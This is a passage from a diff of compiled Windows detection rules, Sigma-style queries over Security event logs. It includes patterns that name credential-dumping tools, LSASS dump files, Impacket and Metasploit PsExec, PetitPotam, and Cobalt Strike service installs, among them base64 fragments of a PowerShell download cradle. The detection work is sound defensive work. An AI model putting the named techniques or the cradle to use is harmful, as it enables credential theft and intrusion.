wscript.exe", - "author": "Tim Shelton", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\ProgramData%' ESCAPE '\\') AND (TargetFilename LIKE '%.jse' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.vba' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\' AND (ServiceFileName LIKE '%${input}%' ESCAPE '\\' OR ServiceFileName LIKE '%noexit%' ESCAPE '\\') AND (ServiceFileName LIKE '% /c %' ESCAPE '\\' OR ServiceFileName LIKE '% /r %' ESCAPE '\\'))" ], - "filename": "file_event_win_cscript_wscript_dropper.yml" + "filename": "win_security_invoke_obfuscation_stdin_services_security.yml" }, { - "title": "PSEXEC Remote Execution File Artefact", - "id": "304afd73-55a5-4bb9-8c21-0b1fc84ea9e4", + "title": "Suspicious Teams Application Related ObjectAcess Event", + "id": "25cde13e-8e20-4c29-b949-4e795b76f16f", "status": "experimental", - "description": "Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.execution", - "attack.persistence", - "attack.t1136.002", - "attack.t1543.003", - "attack.t1570", - "attack.s0029" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\PSEXEC-%' ESCAPE '\\' AND TargetFilename LIKE '%.key' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND (ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\')) AND NOT (ProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" ], - "filename": "file_event_win_psexec_service_key.yml" + "filename": "win_security_teams_suspicious_objectaccess.yml" }, { - "title": "PCRE.NET Package Temp Files", - "id": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", + "title": "ADCS Certificate Template Configuration Vulnerability with Risky EKU", + "id": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", "status": "test", - "description": "Detects processes creating temp files related to PCRE.NET package", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects certificate creation with template allowing risk permission subject and risky EKU", + "author": "Orlinum , BlueDefenZer", "tags": [ - "attack.execution", - "attack.t1059" + "attack.privilege_escalation", + "attack.credential_access" ], "falsepositives": [ - "Unknown" + "Administrator activity", + "Proxy SSL certificate with subject modification", + "Smart card enrollement" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4898' AND (TemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR TemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND TemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\') OR (EventID = '4899' AND (NewTemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND NewTemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\')))" ], - "filename": "file_event_win_pcre_net_temp_file.yml" + "filename": "win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" }, { - "title": "Moriya Rootkit", - "id": "a1507d71-0b60-44f6-b17c-bf53220fdd88", - "status": "test", - "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", - "author": "Bhabesh Raj", - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" - ], + "title": "Password Protected ZIP File Opened (Suspicious Filenames)", + "id": "54f0434b-726f-48a1-b2aa-067df14516e4", + "status": "experimental", + "description": "Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate used of encrypted ZIP files" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\drivers\\\\MoriyaStreamWatchmen.sys' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND (TargetName LIKE '%invoice%' ESCAPE '\\' OR TargetName LIKE '%new order%' ESCAPE '\\' OR TargetName LIKE '%rechnung%' ESCAPE '\\' OR TargetName LIKE '%factura%' ESCAPE '\\' OR TargetName LIKE '%delivery%' ESCAPE '\\' OR TargetName LIKE '%purchase%' ESCAPE '\\' OR TargetName LIKE '%order%' ESCAPE '\\' OR TargetName LIKE '%payment%' ESCAPE '\\'))" ], - "filename": "file_event_win_moriya_rootkit.yml" + "filename": "win_security_susp_opened_encrypted_zip_filename.yml" }, { - "title": "LSASS Process Memory Dump Files", - "id": "a5a2d357-1ab8-4675-a967-ef9990a59391", - "status": "experimental", - "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Windows ANONYMOUS LOGON Local Account Created", + "id": "1bbf25b9-8038-4154-a50b-118f2a32be27", + "status": "test", + "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", + "author": "James Pemberton / @4A616D6573", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1136.001", + "attack.t1136.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\lsass.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.rar' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Temp\\\\dumpert.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Andrew.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Coredump.dmp' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass\\_2%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdmp%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\') OR (TargetFilename LIKE '%SQLDmpr%' ESCAPE '\\' AND TargetFilename LIKE '%.mdmp' ESCAPE '\\') OR (TargetFilename LIKE 'nanodump%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND SamAccountName LIKE '%ANONYMOUS%' ESCAPE '\\' AND SamAccountName LIKE '%LOGON%' ESCAPE '\\')" ], - "filename": "file_event_win_lsass_dump.yml" + "filename": "win_security_susp_local_anon_logon_created.yml" }, { - "title": "Cred Dump Tools Dropped Files", - "id": "8fbf3271-1ef6-4e94-8210-03c2317947f6", + "title": "Credential Dumping Tools Service Execution - Security", + "id": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", "status": "test", - "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", - "author": "Teymur Kheirkhabarov, oscd.community", + "description": "Detects well-known credential dumping tools execution via service execution events", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ "attack.credential_access", + "attack.execution", "attack.t1003.001", "attack.t1003.002", - "attack.t1003.003", "attack.t1003.004", - "attack.t1003.005" + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" ], "falsepositives": [ - "Legitimate Administrator using tool for password recovery" + "Legitimate Administrator using credential dumping tool for password recovery" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\pwdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\kirbi%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwhashes%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_ccache%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_krbtkts%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgdump-log%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\test.pwd' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora64.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wceaux.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SECURITY.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SYSTEM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NTDS.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpExt.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpSvc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pstgdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Dumpy.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%fgexec%' ESCAPE '\\' OR ServiceFileName LIKE '%dumpsvc%' ESCAPE '\\' OR ServiceFileName LIKE '%cachedump%' ESCAPE '\\' OR ServiceFileName LIKE '%mimidrv%' ESCAPE '\\' OR ServiceFileName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceFileName LIKE '%servpw%' ESCAPE '\\' OR ServiceFileName LIKE '%pwdump%' ESCAPE '\\'))" ], - "filename": "file_event_win_cred_dump_tools_dropped_files.yml" + "filename": "win_security_mal_creddumper.yml" }, { - "title": "CVE-2021-26858 Exchange Exploitation", - "id": "b06335b3-55ac-4b41-937e-16b7f5d57dfd", + "title": "CobaltStrike Service Installations - Security", + "id": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", "status": "test", - "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server’s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n", - "author": "Bhabesh Raj", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ - "attack.t1203", "attack.execution", - "cve.2021.26858" + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%CacheCleanup.bin' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.LOG' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%cleanup.bin' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%ADMIN$%' ESCAPE '\\' AND ServiceFileName LIKE '%.exe%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%start%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\') OR ServiceFileName LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR (ServiceFileName LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ServiceFileName LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ServiceFileName LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\')))" ], - "filename": "file_event_win_cve_2021_26858_msexchange.yml" + "filename": "win_security_cobaltstrike_service_installs.yml" }, { - "title": "BloodHound Collection Files", - "id": "02773bed-83bf-469f-b7ff-e676e7d78bab", + "title": "Invoke-Obfuscation Via Stdin - Security", + "id": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", "status": "experimental", - "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", - "author": "C.J. May", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.001", - "attack.t1069.002", + "attack.defense_evasion", + "attack.t1027", "attack.execution", "attack.t1059.001" ], @@ -23906,205 +23357,226 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((TargetFilename LIKE '%\\_BloodHound.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\_computers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_containers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_domains.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_gpos.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_groups.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_ous.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_users.json' ESCAPE '\\') OR (TargetFilename LIKE '%BloodHound%' ESCAPE '\\' AND TargetFilename LIKE '%.zip%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\pocket\\_containers.json' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%set%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND (ServiceFileName LIKE '%environment%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%${input)%' ESCAPE '\\'))" ], - "filename": "file_event_win_bloodhound_collection.yml" + "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml" }, { - "title": "Octopus Scanner Malware", - "id": "805c55d9-31e6-4846-9878-c34c75054fe9", + "title": "Protected Storage Service Access", + "id": "45545954-4016-43c6-855e-eae8f1c369dc", "status": "test", - "description": "Detects Octopus Scanner Malware.", - "author": "NVISO", + "description": "Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.t1195", - "attack.t1195.001" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Cache134.dat' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\ExplorerSync.db' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '%IPC%' ESCAPE '\\' AND RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\')" ], - "filename": "file_event_win_mal_octopus_scanner.yml" + "filename": "win_security_protected_storage_service_access.yml" }, { - "title": "Suspicious File Created Via OneNote Application", - "id": "fcc6d700-68d9-4241-9a1a-06874d621b06", + "title": "AD Privileged Users or Groups Reconnaissance", + "id": "35ba1d85-724d-42a3-889f-2e2362bcaf23", "status": "experimental", - "description": "Detects suspicious files created via the OneNote application. This could indicate a potential malicious \".one\"/\".onepkg\" file was executed as seen being used in malware activity in the wild", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion" + "attack.discovery", + "attack.t1087.002" ], "falsepositives": [ - "False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote.", - "Occasional FPs might occur if OneNote is used internally to share different embedded documents" + "If source account name is not an admin then its super suspicious" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenotem.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OneNote\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.chm' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.htm' ESCAPE '\\' OR TargetFilename LIKE '%.html' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4661' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\')) AND ((ObjectName LIKE '%-512' ESCAPE '\\' OR ObjectName LIKE '%-502' ESCAPE '\\' OR ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-505' ESCAPE '\\' OR ObjectName LIKE '%-519' ESCAPE '\\' OR ObjectName LIKE '%-520' ESCAPE '\\' OR ObjectName LIKE '%-544' ESCAPE '\\' OR ObjectName LIKE '%-551' ESCAPE '\\' OR ObjectName LIKE '%-555' ESCAPE '\\') OR ObjectName LIKE '%admin%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_office_onenote_susp_dropped_files.yml" + "filename": "win_security_account_discovery.yml" }, { - "title": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum", - "id": "ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", - "status": "test", - "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", - "author": "Sittikorn S", + "title": "Possible Impacket SecretDump Remote Activity", + "id": "252902e3-5830-4cf6-bf21-c22083dfd5cf", + "status": "experimental", + "description": "Detect AD credential dumping using impacket secretdump HKTL", + "author": "Samir Bousseaden, wagga", "tags": [ "attack.credential_access", - "attack.t1566", - "attack.t1203", - "cve.2021.33771", - "cve.2021.31979" + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.003" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\physmem.sys%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\IME\\\\IMEJP\\\\imjpueact.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\IMTCPROT.DLL%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\imecpmeid.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\spp\\\\ServiceState\\\\Recovery\\\\pac.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\cy-GB\\\\Setup\\\\SKB\\\\InputMethod\\\\TupTask.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\config\\\\startwus.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\ADMIN$' ESCAPE '\\' AND RelativeTargetName LIKE '%SYSTEM32\\\\%' ESCAPE '\\' AND RelativeTargetName LIKE '%.tmp%' ESCAPE '\\')" ], - "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" + "filename": "win_security_impacket_secretdump.yml" }, { - "title": "UAC Bypass Using NTFS Reparse Point - File", - "id": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", + "title": "Metasploit SMB Authentication", + "id": "72124974-a68b-4366-b990-d30e0b2a190d", "status": "test", - "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Alerts on Metasploit host's authentications on the domain.", + "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Unknown" + "Linux hostnames composed of 16 characters." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\api-ms-win-core-kernel32-legacy-l1.DLL' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID IN ('4625', '4624') AND LogonType = '3' AND AuthenticationPackageName = 'NTLM' AND WorkstationName REGEXP '^[A-Za-z0-9]{16}$') OR (ProcessName = '' AND EventID = '4776' AND Workstation REGEXP '^[A-Za-z0-9]{16}$')))" ], - "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml" + "filename": "win_security_metasploit_authentication.yml" }, { - "title": "Unusual File Modification by dns.exe", - "id": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", + "title": "Possible Shadow Credentials Added", + "id": "f598ea0c-c25a-4f72-a219-50c44411c791", "status": "experimental", - "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch (Nextron Systems)", + "description": "Detects possible addition of shadow credentials to an active directory object.", + "author": "Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.credential_access", + "attack.t1556" ], "falsepositives": [ - "Unknown" + "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-KeyCredentialLink')" ], - "filename": "file_change_win_unusual_modification_by_dns_exe.yml" + "filename": "win_security_susp_possible_shadow_credentials_added.yml" }, { - "title": "File Creation Date Changed to Another Year", - "id": "558eebe5-f2ba-4104-b339-36f7902bcc1a", + "title": "Metasploit Or Impacket Service Installation Via SMB PsExec", + "id": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", "status": "experimental", - "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", - "author": "frack113, Florian Roth (Nextron Systems)", + "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", + "author": "Bartlomiej Czyz, Relativity", "tags": [ - "attack.t1070.006", - "attack.defense_evasion" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Changes made to or by the local NTP service" + "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((PreviousCreationUtcTime LIKE '2022%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '2022%' ESCAPE '\\')) OR (PreviousCreationUtcTime LIKE '202%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '202%' ESCAPE '\\'))) AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\ProvTool.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\usocoreworker.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\ProgramData\\\\USOPrivate\\\\UpdateStore\\\\%' ESCAPE '\\' OR (TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4697' AND ServiceFileName REGEXP '^%systemroot%\\\\[a-zA-Z]{8}\\.exe$' AND ServiceName REGEXP '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)' AND ServiceStartType = '3' AND ServiceType = '0x10') AND NOT (ServiceName = 'PSEXESVC'))" ], - "filename": "file_change_win_2022_timestomping.yml" + "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml" }, { - "title": "Potential PrintNightmare Exploitation Attempt", - "id": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", + "title": "Possible PetitPotam Coerce Authentication Attempt", + "id": "1ce8c8a3-2723-48ed-8246-906ac91061a6", "status": "experimental", - "description": "Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675", - "author": "Bhabesh Raj", + "description": "Detect PetitPotam coerced authentication activity.", + "author": "Mauricio Velazco, Michael Haag", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675" + "attack.credential_access", + "attack.t1187" ], "falsepositives": [ - "Unknown" + "Unknown. Feedback welcomed." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*' ESCAPE '\\' AND ShareName LIKE '%\\\\IPC$' ESCAPE '\\' AND 